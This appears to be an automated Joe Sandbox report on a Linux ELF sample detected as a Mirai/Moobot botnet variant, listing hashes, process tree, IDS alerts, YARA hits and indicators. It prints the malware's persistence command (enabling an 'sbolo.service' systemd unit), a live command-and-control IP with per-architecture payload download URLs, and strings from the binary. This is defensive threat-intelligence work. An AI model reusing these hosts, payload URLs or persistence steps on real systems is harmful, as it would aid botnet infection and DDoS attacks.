Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1528134
MD5:	8a1de97bd5a302571f7cd7cd23ac8ad6
SHA1:	09304aa19c1ff458218098799e844f51e67f671c
SHA256:	8e05d02bfd535a557c2691defd2d30b8d7599e952a06247c7e44554fad54c25a
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Detected Mirai

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gafgyt

Yara detected Moobot

Yara detected Okiru

Connects to many ports of the same IP (likely port scanning)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528134
Start date and time:	2024-10-07 16:30:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal92.troj.linELF@0/3@31/0

Runtime Messages

Command:	/tmp/na.elf
PID:	5532
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	bolu_botnet_done.
Standard Error:

Process Tree

system is lnxubuntu20

na.elf (PID: 5532, Parent: 5454, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/na.elf

na.elf New Fork (PID: 5534, Parent: 5532)

na.elf New Fork (PID: 5537, Parent: 5532)

sh (PID: 5537, Parent: 5532, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

sh New Fork (PID: 5543, Parent: 5537)

systemctl (PID: 5543, Parent: 5537, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service

na.elf New Fork (PID: 5547, Parent: 5532)

systemd New Fork (PID: 5545, Parent: 5544)

snapd-env-generator (PID: 5545, Parent: 5544, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author
na.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
na.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
na.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security

Memory Dumps

Source	Rule	Description	Author
5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: na.elf PID: 5532	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: na.elf PID: 5532	JoeSecurity_Moobot	Yara detected Moobot	Joe Security

Suricata Signatures

ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T16:31:45.189681+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41608	91.200.103.117	23561	TCP
2024-10-07T16:31:53.036571+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41610	91.200.103.117	23561	TCP
2024-10-07T16:32:00.705827+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41612	91.200.103.117	23561	TCP
2024-10-07T16:32:10.330861+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41614	91.200.103.117	23561	TCP
2024-10-07T16:32:15.987943+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41616	91.200.103.117	23561	TCP
2024-10-07T16:32:24.610745+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41618	91.200.103.117	23561	TCP
2024-10-07T16:32:31.298035+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41620	91.200.103.117	23561	TCP
2024-10-07T16:32:42.946301+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41622	91.200.103.117	23561	TCP
2024-10-07T16:32:50.890356+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41624	91.200.103.117	23561	TCP
2024-10-07T16:32:59.891429+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41626	91.200.103.117	23561	TCP
2024-10-07T16:33:02.550490+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41628	91.200.103.117	23561	TCP
2024-10-07T16:33:12.194881+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41630	91.200.103.117	23561	TCP
2024-10-07T16:33:16.817515+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41632	91.200.103.117	23561	TCP
2024-10-07T16:33:27.443917+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41634	91.200.103.117	23561	TCP
2024-10-07T16:33:39.091874+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41636	91.200.103.117	23561	TCP
2024-10-07T16:33:50.745630+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41638	91.200.103.117	23561	TCP
2024-10-07T16:34:02.369016+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41640	91.200.103.117	23561	TCP
2024-10-07T16:34:06.661195+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41642	91.200.103.117	23561	TCP
2024-10-07T16:34:11.338918+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41644	91.200.103.117	23561	TCP
2024-10-07T16:34:16.859216+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41646	91.200.103.117	23561	TCP
2024-10-07T16:34:28.107543+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41648	91.200.103.117	23561	TCP
2024-10-07T16:34:35.957045+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41650	91.200.103.117	23561	TCP
2024-10-07T16:34:41.757202+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41652	91.200.103.117	23561	TCP
2024-10-07T16:34:50.505061+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41654	91.200.103.117	23561	TCP
2024-10-07T16:34:53.266633+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41656	91.200.103.117	23561	TCP
2024-10-07T16:35:00.092749+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41658	91.200.103.117	23561	TCP
2024-10-07T16:35:04.809191+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41660	91.200.103.117	23561	TCP
2024-10-07T16:35:13.498789+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41662	91.200.103.117	23561	TCP
2024-10-07T16:35:18.279983+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.15	41664	91.200.103.117	23561	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 52%

Source: na.elf

String: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc./proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/etc/systemd/system/sbolo.servicew[Unit]

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41608 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41614 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41616 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41610 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41618 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41656 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41620 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41634 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41628 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41622 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41632 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41612 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41630 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41646 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41664 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41644 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41626 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41636 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41624 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41662 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41658 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41652 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41642 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41654 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41648 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41650 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41640 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41638 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41660 -> 91.200.103.117:23561

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561

Source: global traffic

TCP traffic: 192.168.2.15:41608 -> 91.200.103.117:23561

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: yi0key.heleh.com.vn
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: na.elf	String found in binary or memory: http://91.200.103.117/%s
Source: na.elf, 5532.1.00007f1a6042f000.00007f1a6043a000.rw-.sdmp, sbolo.service.12.dr	String found in binary or memory: http://91.200.103.117/bolubotnetsh4

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc./proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/pow

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal92.troj.linELF@0/3@31/0

Source: /tmp/na.elf (PID: 5537)

Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

Jump to behavior

Source: /bin/sh (PID: 5543)

Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.service

Jump to behavior

Source: /tmp/na.elf (PID: 5532)

Queries kernel information via 'uname':

Jump to behavior

Source: na.elf, 5532.1.00007ffe1c6de000.00007ffe1c6ff000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 5532.1.00007ffe1c6de000.00007ffe1c6ff000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: na.elf, 5532.1.00005636b26bd000.00005636b2740000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: na.elf, 5532.1.00005636b26bd000.00005636b2740000.rw-.sdmp	Binary or memory string: 6V5!/etc/qemu-binfmt/sh4

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR

Remote Access Functionality

Detected Mirai

Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5532.1.00007f1a60400000.00007f1a6041a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5532, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	53%	ReversingLabs	Linux.Trojan.Mirai

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		unknown
yi0key.heleh.com.vn	91.200.103.117	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.200.103.117/bolubotnetsh4	na.elf, 5532.1.00007f1a6042f000.00007f1a6043a000.rw-.sdmp, sbolo.service.12.dr	false		unknown
http://91.200.103.117/%s	na.elf	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.200.103.117	yi0key.heleh.com.vn	Germany		30823	COMBAHTONcombahtonGmbHDE	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.200.103.117	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
yi0key.heleh.com.vn	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
